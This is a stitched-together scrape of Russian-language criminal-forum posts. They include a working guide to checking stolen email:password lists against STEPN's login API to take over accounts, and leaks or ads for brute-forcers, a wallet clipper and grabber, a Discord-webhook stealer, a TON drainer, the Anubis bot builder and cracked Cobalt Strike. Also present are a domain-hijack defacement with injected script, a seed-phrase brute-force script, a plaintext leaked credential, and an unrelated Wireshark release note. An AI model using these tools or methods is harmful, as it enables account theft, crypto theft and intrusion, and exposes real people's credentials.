AlMoQRg5I4urN/wBb2YTIMJTfwxgbUrFWyglyff3902oWCJJ4hislKJHzlkEXvdh
s9mEod9NO/b87QMI2JSlX5Fut/J0byIXj3iL7bFH7jCM/a/4F6JxcFk=
Для чего нужен этот проект
Этот пресет проверяет email на регистрацию в stepn. Если аккаунт
зарегистрирован, то сохраняет его в гуды. Полученные аккаунты ручками
проверяются на баланс и на кроссовки. Да, кроссовки можно продать и получить
криптовалюту.
Что такое stepn
m.stepn.com - это игра, которая платит вам криптовалютой за то что вы ходите.
В приложении можно приобретать кроссовки, чинить их, улучшать, пополнять
криптовалютный баланс(эфириум и другие сети поддерживаются). Сейчас, конечно,
у stepn не лучшие годы, он был на хайпе до этих событий:
https://xss.is/threads/68052/
Но могу сказать, что за неделю до того, как приступил писать этот проект на
конкурс нашел аккаунт с кроссовком на 200$ и успешно их продал. Так что все
ок, проект жив. Можно использовать его в браузере m.stepn.com или скачать
мобильное приложение. Если взглянуть на новости то не всех так плохо, как
кажется.
Предыстория
Как все начиналось. В брутфорсе я
давно
Еще в школу ходил. Мы с товарищем работали по валиду азии, думали где найти
новые проекты, которые хайпятся и вывод не составит труда. Сам я не сильно
крутился в крипте, знал, как создать холодный кошелек и запросить средства)))
Я обратился на соседний форум, раздал материала валидного и тут мне пишет в
личку человек: "Мужик, мне зашла твоя базка оставь кош закину на чай". Даю ему
кош и начинаю думать, я же дал отработку, где он смог достать крипту... К
сожалению проект сразу определить не удалось. Мы стали с ним работать. Я ему
поставлял валидные мыла, он с них снимал stepn балик и кроссы продавал. В один
момент он мне пишет, что вот нашел аккаунт, не успел продать кросс, а пароль
сменил холдер. Дает емейл и просит сбрутить. Я такой опаа))) Пора повбивать
этот аккаунт по популярным криптосервисам. Я стал гуглить "самые популярные
криптобиржи азии". И сидел вбивал... Думаю какого хрена нигде не
зарегистрировано. Отдаю этот аккаунт другому знакомому, спустя часик он мне
подсказал что это stepn. И сказал, что уже видел письма на почтах от этого
сервиса. Я решил отписаться тому человеку, что нашел проект который он крутит.
В итоге он посмеялся и рассказал мне, что сложнее всего это продать кроссовок,
а не сервис этот заполучить. Он мне выдал 100 тысяч гудов и чекер.
Договорились, что я подберу пароль к мылам и отдам ему. Ну он поснимал мне, не
помню какой профит с этого вышел может 1500-2000$.
Создаем проект
В прошлой статье (https://xss.is/threads/105597/) я уже рассказывал, как
подойти к написанию брутфорсера на tronscan тут похожая ситуация поэтому
некоторые моменты будут опущены. Я понимаю лень читать большие куски кода,
особенно, когда ты не знаком с синтаксисом языка. Поэтому постараюсь
рассказать так, чтобы даже новичку было понятно. A-Parser сам по себе очень
гибкий и не обязательно прописывать разделение email:pass на JS. Реализуем это
куда проще.
$query.query - это сам запрос, который используется по умолчанию для $query. С
помощью регулярного выражения мы разбиваем $query на одну часть $1 to: query.
То есть получаем email. А почему мы не делаем вот так:
$query.query это тоже самое, что и $query.
$2 нам не нужен, пароль может быть любой. Мы ведь определяем мыло
зарегистрировано или нет, пароль нам неважен.
Используем опцию Bypass CloudFlare. Как она работает мне неизвестно, но лишним
не будет, ведь stepn использует cloud.
Дальше надо парсить ответ от сервера и сохранять гуды, в зависимости от
ответа. A-Parser использует шаблонизатор Template Toolkit. Ознакомиться тут:
https://a-parser.com/docs/guides/template-toolkit/overview
Code:Copy to clipboard
[% j = tools.parseJSON(p1.data);
IF !j.msg.match('Incorrect username\/password');
query.orig _ (j.msg.match('Google Authenticator') ? ' | Google Auth' : '') _ "\n";
END %]
query.orig используем потому что нужно email:pass сохранять (исходный запрос),
а не просто email, который с помощью regex был разбит.
j хранит ответ от сервера в формате json. Если ответ не содержит Incorrect
username/password, то сохраняем query (наш запрос).
Мы разбили строку email:password на email и сохранили ее как query, добавили
обход CloudFlare, прописали условия в шаблонизаторе для сохранения гудов, ну и
конечно же осталось сформировать запрос, который будет лететь к API, чтобы
получать ответ в JSON.
Code:Copy to clipboard
https://apilb.stepn.com/run/login?account=$query&password=abcdefg&type=3&deviceInfo=web
Обратите внимание, что пароль может быть любой. Это абсолютно важно. Откуда я взял этот запрос? Зашел на m.stepn.com попытался войти в учетку и перехватил запрос, используя Burp Suite.
Нравится вам такой формат? Продолжать?
Spoiler: Спонсоры
[+] Мульти подмена кошельков
(подменяет в любом скопированном тексте и ссылках все кошельки которые есть)
[+] Подмена кошельков в файлах
(Поиск текстовых файлов и массовая замена всех найденных кошельков в них)
[+] Гибко настраиваемые оповещения в телегам бота
Spoiler: Скрин сообщения в ТГ
[+] Wallet Grabber - отправка в ТГ архивом
You must have at least 10 reaction(s) to view the content.
Купил у какого то Иранца. Максимальной простой скрипт на Py, плюс - работает
довольно шустро.
Со слов автора лучше работает на WordPress & Opencart CMS.
Magento очень туго мне давал.
- Python версии 3.5
- Установить requests
- ваши url в list.txt
cd /Multi CMS Brute Force
python3 multi.py
list.txt
You must have at least 11 reaction(s) to view the content.
З.Ы. Если у кого получится допилить что бы он вместо логина admin спрашивал разные (user/test), то отстук будет лучше.
Брут вк
Работает как по API так и через сайт (выбираем в настройках)
SBA - сохранение bad аккаунтов (вдруг кому нужно)
Хотел ещё чекер сделать но чёт лень -- Это мой последний софт в 2018 ^^
Оригинал тема
Тут маленька предистория вынудившая меня его сюда выложить ну и сам софт.
Попросил я у автора скидку и договорился что буду остачу докидать с профита.
К моему удивлению, он согласился.
Я отправил ему 2850$.
К сожалению, мои удивления не закончились на этом.
Дальше у меня сложилось впечатление, что человек, писавший тему, и человек,
сидящий в телеграме, это две разные личности.
По теме была красивая обертка, но на самом деле внутри было кусочек говна.
После покупки автор стал закрытым типом, который clearly не хотел общаться,
поэтому я решил не задавать лишних вопросов.
Я получил софт и первоначальную инструкцию по установке. Дальше пошло вкратце
по пунктам:
Софт оказался неполным с отсутствующими файлами, поэтому никто не смог его
установить.
Без таблицы баз данных. Автор сказал, что его кодер установит за пару соток, и
так и случилось.
Инструкция по пропуску расширения вообще была треш и выглядела так: "Сделай
себе расширение." На вопрос, зачем, если он уже дал расширение в комплекте,
автор забыл уточнить в теме, что оно только для примера и не проходит
модерацию.
Я создал расширение и услышал дальше: "Берешь .js файл с ботнетом и ставишь
его вместо оригинального файла в твоем расширении. Загружаешь оригинал в
хромстор и после обновляешь уже на расширении с ботнетом." Я, не имеющий опыта
с расширениями, понял, что оно не пройдет модерацию, так как теперь не
рабочее. Я это говорил автору 3 раза, но он уходил от темы. Я решил
попробовать, раз он сказал так. ( + его ботнет палился дефендером и априори не
мог работать) После установки в браузер дефендер удалял ботнет.
Я пытался загрузить его 2 месяца, и только через 2 месяца, когда мне надоело и
я начал писать автору, и услышал, что оно действительно не проходит
модерацию....
После этого произошел такой диалог:
Я: "Инструкция не работает."
Автор софта: "Не было соглашения, что она будет работать."
Я: "Это как заказать в ресторане пельмени, а тебе принесли их замороженные и
сказали, что не было соглашения, что мы их разогреем."
Автор: "Странное сравнение, но фактически верно."
После этого я понял, что нужно что-то делать, и обратился к кодерам, которые
заявили, что такого говно-кода в расширениях не видели и всё надо
переписывать. Параллельно я решил перепродать софт (ведь соглашения не было о
том, что его нельзя перепродавать) и разместил объявления по чатам. Кто-то из
купивших софт сказал, что он дал мне старую версию. И вы знаете, что этот
автор СДЕЛАЛ ДАЛЬШЕ? Зашел на сервер и удалил все файлы (правда, не помогло, я
делал копию). После этого его можно назвать только крысой и п#даром!!! Разве я
не прав?
Ведь соглашения о неразглашении не было.
Исходя из вышеизложенного, а именно того, что из темы на миллион символов по
факту работающей была только одна строка: "ПАНЕЛЬ", и ее разглашение никак не
могло повлиять на работоспособность софта, я решил опубликовать ее здесь.
Прошу администрацию учесть факты мошшеничества пользователя suvokner и не
удалять слив.
Автор сам согласился, что договора о неразглашении не было.
P.S. С трудностями я прошел модерацию в хромстор, но ни одной строчки от кода автора там не было.
Также ищу дропер под расширение для покупки/аренды/%. Могу предоставить от 10 тысяч установок в день.
ПАРОЛЬ xss
You must have at least 30 reaction(s) to view the content.
Spoiler: 3 у вас 43
скачать тыц
Anubis Билдер на исходниках с автоотключением ГП и автоудалением бота
Сливаю билдер Анубис 2.5 за ноябрь месяц, там не реализованы последний обход ГП и другие дополнения, которые появились в мод сборках в декабре.
](https://radikal.ru/lfp/a.radikal.ru/a21/2002/a3/6737f4658b58.png/htm)
Радикал-Фото - сервис публикации изображений для форумов и блогов: Картинка
radikal.ru
Ну у кого есть желания и мозги работают, может вытянуть все из билда за январь 2020 и поставить в исходники.
Всяким там любителям халявы пишу, что не надо в теме или лс просить личный,
даю только тем у кого немного не хватает до хайда, остальным просьба не
писать.
Хайд делается для того, чтобы увидеть, скачать могли активные пользователи,
которые приносят пользу форуму в его развитии.
You must have at least 100 reaction(s) to view the content.
coding.net/u/ssooking/p/cobaltstrike-cracked/git
пароль: ssooking
Функционал программы:
Скачать:http://rgho.st/8nfKNG9Jt
virustotal:
https://www.virustotal.com/ru/file/...95276454bd89a51146f77ee9/analysis/1545727995/
Предупреждение: Софт не мой,взят из другого борта так что я не отвечаю за вашу
безопасность.Использовать на СВОЙ СТРАХ И РИСК !! Рекомендую виртуалку
1.Хорошая скорость работы
2. Перебрут капчи
3. Сохранение остатка
ps : движок тот же что и для vk софта но пофиксил пару багов .
piaro.org
Сайт для накрутки!
Брут \ Чекер
Чекер на покупки софтов
You must have at least 20 message(s) to view the content.
Checker Mega.nz - принимает базы вида e-mail : password, проверяет на валид
После чека, валид ложим в Content Mega.nz и получаем список файлов на учетках
](https://mega.nz/#!LEhn2CLS!IQqMwbQ6Vwr8A7Tp1LWT_8VNO6pz8tN8KEwep-T9Y7E)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now
mega.nz
От Автора : делал на заказ одному челу, он меня заебал завтраками кормить,
отдаю вам на растерзание, софт не доработан может быть не добрут.
вырезал авторизацию в софт так что смело пользуйтесь
да и времени нету. на работе авраль, полная жопа
вообщем если нужен этот - wish потом доделаю, уберу не добрут и т.д.
Spoiler: Вид лога
-========= < Данные, счет > =========-
Данные для входа:
cagcguzman@outlook.com:carlosjuan1980
Баланс: $0.00
-========= < Информация > =========-
Регистрация: 2018-04-08 | Время: 04:38:27 | День Рождение: 1984-04-05
Телефон: Null | Имя: Carlos Guzman
Cтрана: US | Бан: Yes
Spoiler: скачать
View and download from Yandex.Disk
yadi.sk
Spoiler: вт
https://www.virustotal.com/gui/file...852c60e00f02ebedd60725df7c14d3d1121/detection
Существуют ли бесплатные проги для брута фортнайт? Если да, то дайте название/ссылку
Сабж в названии. Поместить в папку с логами (там должны быть папки, в которых есть файл PasswordsList.txt (ну или нет его) )
И запустить
Продается брутфорс Mail.ru(во всех доменных зонах), который НЕ ТРЕБУЕТ ПРОКСИ, т.к. работает по протоколу http.
Мультипоточный (до 255 потоков).
По вопросам покупки обращатся в пм или асю-XXXXXXXXX
Программа распространяется с согласия автора - FUF.
Цена - 5 WMZ.Click to expand...
кароче обменял я эту прогу,и если честно такого бреда еще не видел =)
я ожидал,конечно,немного большего=)
а тут вводишь логин;пасс............ВРУЧНУЮ..........вот так вот тупо.........автор тупит.......в первой версии ваще лол был.........в этой лучше.......а в следующей буэт с файла загруза.....и он скорость увеличил
Click to expand...
и чтобы никто не тратил свои кровно заработанных енотов я ее решил выложить!
так что кому надо-забираем,а вдруг пригодиться =)
Hello Community,
I'm excited to announce the release of my C++ project.
This C++ Stealer is designed to log data, which will be sent to your Discord
channel using a webhook
Here are some notable features of the Stealer:
Browser
Wallet
Extension
RU:
Update
v2.9
-Добавили чек стоимости инвентаря Steam
-Добавили сортировку аккаунтов с Ножами, Перчатками. (Steam)
-Добавили проверку на активные лоты продажи (Steam)
-Исправили чек Community Ban, VAC Ban (теперь отображает название игры) (Steam)
-Добавили проверку на Prime CS2 (Steam)
-Обновили уведомления в Telegram об окончании работы. Теперь необходимо указать только UserID получателя.
-Другие мелкие исправления
EN:
Update
v2.9
-Added Steam inventory value check
-Added sorting of accounts with Knives, Gloves. (Steam)
-Added check for active sale lots (Steam)
-Corrected check Community Ban, VAC Ban (now displays the name of the game) (Steam)
-Add check for Prime CS2 (Steam)
-Updated notifications in Telegram about the end of work. Now you only need to specify the recipient's UserID.
-Other minor fixes
You must have at least 5 reaction(s) to view the content.
TON DRAINER | ( TOD ) ( ~~2500$~~ FREE)
Данный контент предоставлен в ознакомительных целях. Ответственность за ваши действия платформа и автор не несет!
Функции
Авто обмен, авто-отправка комиссии, обход бана тонкипера, повторный запрос
транзакции.
Spoiler: Ссылка на скачивание
You must have at least 20 reaction(s) to view the content.
Spoiler: VirusTotal
](https://www.virustotal.com/gui/file/cd8c1de474ae2912e11ed66a5b520dad9f51b7e1b550a1b8855b0370751af68d)
VirusTotal
www.virustotal.com
На поддержание дальнейших сливов:
Ton: UQC5FsuauLLucOuLYuPzXF-LEJVsAtx0aAwgdzq_ElXN5I1E
Usdt Trc20: TD6zrTrXQy4zqaMt1XRY1EbKJmm3ok36so
Spoiler: Другие скриншоты
Расширение для Google Chrome работает в фоновом режиме и проверяет посещаемые вами страницы. Оно автоматически обнаруживает внешние JavaScript-файлы, которые загружаются на эти страницы, и сообщает вам о тех скриптах, которые не удается корректно загрузить.
Более того, данное расширение также производит анализ доменов, на которых расположены скрипты, с использованием API GoDaddy, чтобы определить их доступность для покупки. Если домен доступен для приобретения, расширение уведомляет вас об этой возможности.
Для чего нужно расширение?
Предположим, вы - администратор сайта, разместили внешний JavaScript на своем веб-сайте, будь то статистика посещений, виджет, чат или любой другой функциональный элемент. С течением времени владелец домена, на котором размещен этот скрипт, забывает продлить его. Вы, возможно, не замечаете, что ваш виджет.js или чат.js перестает работать, и на вашем сайте появляется ссылка на скрипт, домен которого сейчас продается.
~~При помощи расширения злоумышленник находит (случайно замечает) незагруженный внеший JavaScript, который не загрузился из-за истечения срока действия домена и покупает этот домен, чтобы разместить свой собственный скрипт. Это может называться "Доменное перехватывание" или "Доменный киберсквоттинг".~~
И вот здесь на помощь приходит данное расширение. Оно сканирует внешние JavaScript-файлы во время серфинга в фоновом режиме и проверяет доступность домена на котором они расположены для покупки. Если расширение обнаружит такой скрипт на одной из посещенных вами страниц, оно оповестит вас.
Пример
Spoiler
Решил пошарить по сайтам, запрос был "SAMP моды". Спустя немного времени, попал на чей-то старинный дор <http://pogonina.com/?onf=skachat-server-mod- dlya-samp> (который видимо сделали под загрузки, так еще и под СНГ - такое мы осуждаем). Расширение отработало и показало, что на сайте имеется ссылка на 2 JS-скрипта, которые расположены на домене cloud-js точка ru
Spoiler: Cкрин
Посмотрел сколько он стоит...
Spoiler
Решил купить, сделать дефейс этого *** для примера. Да и вообще посмотреть,
быть может на него и другие cтаринные доры ссылаются еще.
Разместил на cloud-js точка ru/images/ajax2.js
Такой код:
Code:Copy to clipboard
window.addEventListener('load', function() {
if(document.getElementById("baviku")){
var htmlToInsert = "<div><h1 style='color:white;margin-top:300px;'>XSS.AS</h1></div><div style='color:white;'>Не забывайте о внешних javascript'ах</div>";
document.getElementById("baviku").insertAdjacentHTML('beforebegin', htmlToInsert);
document.getElementById("baviku").remove();
}
});
Скрипт просто подождет пока загрузится страничка, удалит блок с контентом дора и разместит надпись "XSS.AS | Не забыйте о внешних javascript'ах"
Что получилось:
Spoiler
На cloud-js точка ru/images/ajax1.js разместил скрипт через который буду получить информацию на каких еще страницах установленн данный скрипт.
Потом перешёл на главную страницу. Это сайт про какую-то шахматистку, который
взломали и разместили на нем дорвей.
На сайте кстати тоже есть внешние, забытые JS (домен правда не купить)
Spoiler
====
Как установить расширение?
Spoiler
1.Открываем Google Chrome, вставляем в адресную строку "chrome://extensions/" (Без кавычек) и переходим
Spoiler
2. Прожимаем кнопку "Load unpacked" или "Загрузить распакованное расширение" и указываем папку с распакованным архивом (Ссылка на архив с расширением будет внизу). Если все сделаете правильно, появится наше расширение (скрин ниже под спойлером).
Spoiler
3. В правом углу экрана выбираете расширение, настраиваете как вам удобно.
Spoiler
4. Для тех, кто не хочет проверять домены (можно купить домен или нет?) на моем сервере - отжимаете галочку "Проверять доступность домена для покупки с помощью сервера создателя" в настройках.
Кто хочет проверять на моем сервере, предупреждаю - я буду сохранять ссылки, которые будут приходить ко мне на сервер. Если сервер вдруг ляжет или его заблокируют, ответы вам идти не будут и ссылки проверяться тоже (просто предупреждаю, учитывайте это). Советую вам отжать галочку и поставить cкрипт к себе на хостинг, проверять с помощью своего скрипта, но это не обязательно - через мой тоже будет работать какое-то время (потыкать, посмотреть как работает расширение, думаю вам хватит)
Spoiler
Такое будет описание, если нажмете на ссылку "[Где взять скрипт проверки]"
Spoiler
Не забудьте заменить на свои API ключи
PHP:Copy to clipboard
$apiKey = "gGrgXqQquG3u_XnAqfboqKEkwoXkwofwB27"; // Замените на ваш ключ API
$apiSecret = "NxssddlfiGwxxXeigjoGiegyik"; // Замените на ваш секретный код API
ping.php
PHP:Copy to clipboard
<?php
header('Access-Control-Allow-Origin: *');
header("Content-Security-Policy: default-src 'self' *;");
function isLinkAvailable($url) {
$headers = @get_headers($url);
return $headers && (strpos($headers[0], '200') !== false || strpos($headers[0], '30') === 0);
}
function getDomainFromUrl($url) {
$urlParts = parse_url($url);
if (isset($urlParts['host'])) {
return $urlParts['host'];
}
return null;
}
if ($_SERVER["REQUEST_METHOD"] === "POST") {
if (isset($_POST["linkjs"]) && isset($_POST["link"])) {
$linkjs = $_POST["linkjs"];
$link = $_POST["link"];
if (isLinkAvailable($linkjs)) {
echo "Ссылка доступна.";
} else {
echo "Ссылка недоступна. | Шаг 1";
$domain = getDomainFromUrl($linkjs);
$checkType = "FULL"; // Выберите 'FAST' или 'FULL'
$forTransfer = false; // Выберите true или false
$baseURL = "https://api.godaddy.com"; // URL для продукционного окружения
// $baseURL = "https://api.ote-godaddy.com"; // URL для тестового окружения
$url = "$baseURL/v1/domains/available?domain=$domain&checkType=$checkType&forTransfer=$forTransfer";
$apiKey = "gGrgXqQquG3u_XnAqfboqKEkwoXkwofwB27"; // Замените на ваш ключ API
$apiSecret = "NxssddlfiGwxxXeigjoGiegyik"; // Замените на ваш секретный код API
$headers = array(
"Authorization: sso-key $apiKey:$apiSecret"
);
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HTTPHEADER => $headers,
));
$response = curl_exec($curl);
curl_close($curl);
$data = json_decode($response, true);
if ($data["available"]) {
echo "<br>Домен $domain доступен для покупки. | Шаг 2";
// Дополнительные действия при доступности домена
} else {
echo "<br>Домен $domain недоступен для покупки.";
// Дополнительные действия при недоступности домена
}
}
} else {
echo "Ссылка не была передана.";
}
} else {echo "Доступен";}
?>
Скачать
расширение
(onion)
Состоялся релиз новой стабильной ветки сетевого анализатора Wireshark 3.0. Напомним, что изначально проект развивался под именем Ethereal, но в 2006 году из-за конфликта с владельцем торговой марки Ethereal, разработчики были вынуждены переименовать проект в Wireshark.
В Wireshark 3 удалена реализация старого интерфейса пользователя, основанного на библиотеке GTK+. В прошлой ветке Wireshark 2 интерфейс пользователя был переведён с GTK+ на Qt, но старый интерфейс оставался доступен в качестве опции. В новом интерфейсе прекращена поддержка Qt 4.x, для работы теперь требуется как минимум Qt 5.2.
Ключевые новшества Wireshark 3.0.0:
Начальная поддержка токенов PKCS #11 для расшифровки RSA в TLS (добавить ключи для расшифровки можно в секции настроек в меню "RSA Keys");
Обеспечена поддержка повторяемых сборок, позволяющих любому пользователю убедиться, что предлагаемые бинарные сборки сформированы на основе опубликованных исходных текстов;
Добавлена поддержка преобразования меток времени для протоколов UDP/UDP-Lite;
В анализатор TShark добавлена опция "-G" для генерации файла сопоставлений (mapping) для ElasticSearch;
Добавлен диалог с информацией о применяемой системе захвата трафика (Capture Information);
В модулях разбора (dissector) потоков Ethernet и IEEE 802.11 по умолчанию отключена верификация последовательности кадров (контрольных сумм);
В модуль разбора TCP добавлена настройка "Reassemble out-of-order segments", позволяющая решить проблемы с разбором и расшифровкой потоков при неупорядоченном поступлении сегментов;
Добавлен новый модуль WireGuard Dissector для расшифровки трафика VPN WireGuard;
Модуль разбора BOOTP переименован в DHCP, а модуль SSL в TLS;
Добавлена возможность переноса между профилями настроек правил подсветки, графиков ввода/вывода, фильтров и настроек протоколов;
При импорте шестнадцатеричных дампов предоставлена возможность указания заголовка ExportPDU для прямого вызова необходимого модуля разбора, без обращения к модулям нижележащих протоколов;
В extcap-интерфейсы sshdump и ciscodump добавлена поддержка использования прокси для SSH-соединений;
В dumpcap добавлены опции "-a packets:NUM" с определением условия прекращения захвата после записи в дамп NUM пакетов и "-b packets:NUM" с определением лимита по числу пакетов в одном файле;
Добавлен отдельный профиль "No Reassembly" для отключения нормализации трафика;
В систему сборки добавлена поддержка формирования самодостаточных установочных пакетов в формате AppImage;
Реализована возможность расшифровки DTLS и TLS из файлов pcapng, включающих блок DSB (Decryption Secrets Block) c захваченными ключами (TLS Key Log);
В утилиту editcap добавлена опция "--inject-secrets" для прикрепления файла с захваченными ключами (TLS Key Log) к файлу pcapng;
В dfilter добавлена функция string() для преобразования нестроковых полей в строки для последующего использования в функциях сопоставления;
Добавлены переводы интерфейса для русского и украинского языков;
Сборки для Windows теперь поставляются с Npcap вместо WinPcap. Версия для macOS теперь может работать только в выпусках 10.12+;
Добавлена поддержка декодирования формата Ruby Marshal, используемого для сериализации объектов;
Добавлена поддержка захвата данных, передаваемых через AUX-канал интерфейса DisplayPort;
Добавлена поддержка извлечения данных из форматов PEM (RFC 7468) и файлов экспорта systemd Journal;
Обеспечена поддержка новых протоколов:
Apple Wireless Direct Link (AWDL),
Basic Transport Protocol (BTP),
BLIP Couchbase Mobile (BLIP),
CDMA 2000,
Circuit Emulation Service over Ethernet (CESoETH),
Cisco Meraki Discovery Protocol (MDP),
Distributed Ruby (DRb),
DXL,
E1AP (5G),
EVS (3GPP TS 26.445 A.2 EVS RTP),
Exablaze trailers,
General Circuit Services Notification Application Protocol (GCSNA),
GeoNetworking (GeoNw),
GLOW Lawo Emberplus Data,
Great Britain Companion Specification (GBCS),
GSM-R (User-to-User Information Element usage),
HI3CCLinkData, Intelligent Transport Systems (ITS),
ISO 13400-2 Diagnostic communication over Internet Protocol (DoIP),
ITU-t X.696 Octet Encoding Rules (OER),
Local Number Portability Database Query Protocol (ANSI),
MsgPack,
NGAP (5G),
NR (5G)
PDCP,
Osmocom Generic Subscriber Update Protocol (GSUP),
PCOM,
PKCS#10 (RFC2986 Certification Request Syntax),
PROXY (v2),
S101 Lawo Emberplus,
Secure Reliable Transport Protocol (SRT),
Spirent Test Center Signature (STCSIG),
TeamSpeak 3 DNS,
TPM 2.0,
Ubiquiti Discovery Protocol (UBDP),
WireGuard,
XnAP (5G).Click to expand...
Давно тешу себя надеждой случайно найти кошелек с забытыми там кем-то битками)
Так вот, ковыряясь в мире криптовалют, я решил стать современным Шерлоком
Холмсом и охотиться за забытыми битками, как детектив за утерянными
сокровищами. Взял в руки пальто, шляпу и, конечно же, Python - великого
помощника в решении самых сложных головоломок.
Мой скрипт стал настоящим асом в мире криптовалютного детективизма. Он, как
настоящий шпион, генерирует фразы, ковыряется в таинственных кошельках, словно
засекреченный агент. А ведь это не просто генератор фраз – это мой верный
напарник в охоте за забытыми сокровищами в криптовалютных джунглях.
Этот незаметный агент, прячущийся в докере, как настоящий ниндзя, двадцать
четыре часа в сутки проводит настоящее расследование. Он молча, но решительно
пробегает через 20 тысяч кошельков, словно кибер-Шерлок в поисках следов
забытых биткойнов.
И вот, когда все мирно спят, мой скрипт открывает свои криптоглаза и рассылает
уведомления в Телеграм. "Сколько проверено, сколько найдено" - как результат
успешной миссии. А еще добавил интригу: "Из какого тайного IP появился отчет?"
- словно шифровальщик, покрывающий свои следы.
Он не нуждается в прокси, ведь он – мастер в обходе преград, настоящий крипто-
акробат, совершающий свои прыжки по блокчейну.
И вот он, мой криптодетектив, фиксирует кошельки, в которых скрыты балансы и
тайные транзакции. Это не просто кошельки, это криптоарены, в которых биткойны
играют в свою лучшую игру - прятки.
Так что, пока все ищут смысл жизни, мой скрипт находит забытые биткоины. Как
сказал бы крипто-Шерлок: "Элементарно, мой дорогой софт!"
Spoiler: Код скрипта
Python:Copy to clipboard
import mnemonic
import bitcoin
import requests
import time
import socket
from telegram.bot import Bot
bot = Bot(token="YOUR_TOKEN")
chat_id = 'YOUR_CHAT_ID'
try:
bot.send_message(chat_id=chat_id, text="Начинаем майнить бабло)")
except requests.exceptions.RequestException as e:
print("Error sending message to Telegram: ", e)
# You can add any additional error handling here
address_count = 0
last_stat_time = time.time()
while address_count < 1000000:
# Generate a random mnemonic phrase
mnemo = mnemonic.Mnemonic("english")
secret_phrase = mnemo.generate(strength=256)
# Convert the mnemonic phrase to a seed
seed = mnemonic.Mnemonic.to_seed(secret_phrase)
# Generate the private key from seed
priv = bitcoin.sha256(seed)
# Generate the public key from private key
pub = bitcoin.privtopub(priv)
# Generate the address from public key
address = bitcoin.pubtoaddr(pub)
# check balance and number of transactions
response = requests.get("https://blockchain.info/rawaddr/" + address)
if response.status_code == 200:
data = response.json()
balance = data["final_balance"]
transactions = data["n_tx"]
print("Checking address: ", address)
print("Balance: ", balance)
print("Number of transactions: ", transactions)
if balance > 0 or transactions > 0:
with open("good.txt", "w") as f:
f.write(address + " : " + secret_phrase)
message = address + " : " + secret_phrase + "\n"
bot.send_message(chat_id=chat_id, text=message)
break
elif response.status_code == 404:
print(f"Address {address} not found")
else:
print(f"Request failed with status code {response.status_code}")
# Отправка статистики раз в 6 часов
current_time = time.time()
if current_time - last_stat_time > 6 * 60 * 60:
stat_message = f"Проверено кошельков: {address_count}\n"
empty_addresses = sum(1 for _ in range(address_count) if balance == 0 and transactions == 0)
stat_message += f"Найдено пустых: {empty_addresses}\n"
stat_message += f"Найдено с балансом: {address_count - empty_addresses}\n"
stat_message += f"IP address: {socket.gethostbyname(socket.gethostname())}"
bot.send_message(chat_id=chat_id, text=stat_message)
last_stat_time = current_time
time.sleep(5)
address_count += 1
Ниже приведу содержимое Dockerfile для развертывания
Spoiler: Dockerfile
Code:Copy to clipboard
FROM python:3.9
WORKDIR /app
COPY . /app
RUN pip install --no-cache-dir -r requirements.txt
CMD ["python3", "bablo.py"]
Ну и requirements.txt куда ж без него:
Spoiler: requirements
Code:Copy to clipboard
telegram
bitcoin
mnemonic
requests
python-telegram-bot==13.1
Закидываете все три файла на сервак и вперед, за длинным битком) Не забудьте указать токен бота и chat_id
docker build -t bablo .
docker run -d --name bablo bablo
P.S.: Да, я знаю, что многие скажут, что шансы найти кошелек с балансом стремятся к 0, но в таких ситуациях я предпочитаю Теорию вероятностей.
Данный софт представляет собой программу для поиска кошельков MetaMask в логах и перебора множества паролей для получения seed-фраз и паролей от кошельков.
Click to expand...
Spoiler: В чем его преймущество перед парсерами?
Данный софт превосходит любые парсеры кошельков MetaMask, по крайней мере, тем, что вам не нужно искать и перебирать пароли для входа, что может быть достаточно проблематичным. Брутфорсер самостоятельно найдет все кошельки MetaMask и выполнит перебор паролей не только из логов, но и сгенерирует новые на основе тех, что были получены из логов. А если и это не поможет, то можно использовать собственный личный словарь паролей, который, кстати, будет автоматически пополняться после каждого вашего брутфорса.
Spoiler: Функционал
1. Проверка публичных логов и удаление их с использованием метода поиска
ключевых слов, таких как "Cloud", "Free logs", в названиях логов и в файле
UserInformation.
2. Проверка и удаление исполняемых файлов из логов.
3. Использование готовых словарей паролей.
4. Генерация паролей на основе паролей из логов.
5. Самопополняющийся словарь паролей, состоящий из проверенных логов и
сгенерированных на основе паролей из логов.
6. Многопоточность.
7. Мониторинг затраченного времени на брутфорс.
8. Мониторинг успешного и неудачного брутфорса.
Spoiler: Как работает брутфорс?
Сначала используются пароли из логов. Если ни один из них не подходит, то используются пароли, которые были сгенерированы на основе паролей из логов. Если и это не приводит к успеху, то используются пароли из готового словаря. Также в privat_1 записываются пароли из логов и сгенерированные на основе паролей из логов, чтобы с каждым проверенным логом вы могли расширить свой словарь и сделать каждый последующий брутфорс более эффективным.
Spoiler: Настройка и компиляция брутфорсера
1. Запустите XSSMetaBruter.sln.
2. Откройте и измените файл config.json под себя, расположенный по пути
\XSSMetaBruter\bin\Release.
Обозначение значений в config.json:
"pass_dictionary": Путь до готового словаря.
"threads": Количество потоков.
"delete_empty_logs": Удалять или нет пустые логи.
"newdict_path": Путь до файла, в который будут записываться новые пароли для
вашего словаря.
"check_virus": Удаление exe файлов из логов.
"check_cloud": Проверка на логи из облака.
"delete_cloud": Удаление логов из облака.
3. В Visual Studio скомпилируйте проект в режиме Release.
4. Запустите получившийся exe файл.
5. Перетащите папку с логами в открывшуюся консоль и нажмите Enter.
6. Дождитесь окончания брутфорса; результаты будут сохранены в файле txt
рядом с вашим exe файлом брутфорсера.
Spoiler: Вид лога
Spoiler: Ссылка на скачивание исходников проекта
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/NP1HyDJD#NUYB6qZRzgkrZlONFUiMB-x7xS5fOp7A7OSSFiZaJVA)
mega.nz
Metasploit Pro 2022 Full Activated - CyberSecurity Tools - Discount 100%
OFF
Knowledge is power, especially when it’s shared. A collaboration between the open-source community and Rapid7, Metasploit helps security teams do more than just [verify vulnerabilities](https://www.dr-farfar.com/netsparker- professional-full/), manage security assessments, and improve security awareness; it empowers and arms defenders to always stay one step (or two) ahead of the game.
Source :www.Dr-FarFar.com
Поделитесь ил продайте NL Brute софт для брута рдп.
Версию с работой до 2000 потоков, без ограничения кол-ва запуска копий на
одном сервере. Без бага на вылет софта из-за "плохого IP'a".
Без склеек и сендеров гудов, (понятное дело).
Готов рассмотреть разные варианты, так же рассмотрю вариант приобритения
кейгена который работает как привязка к железу.
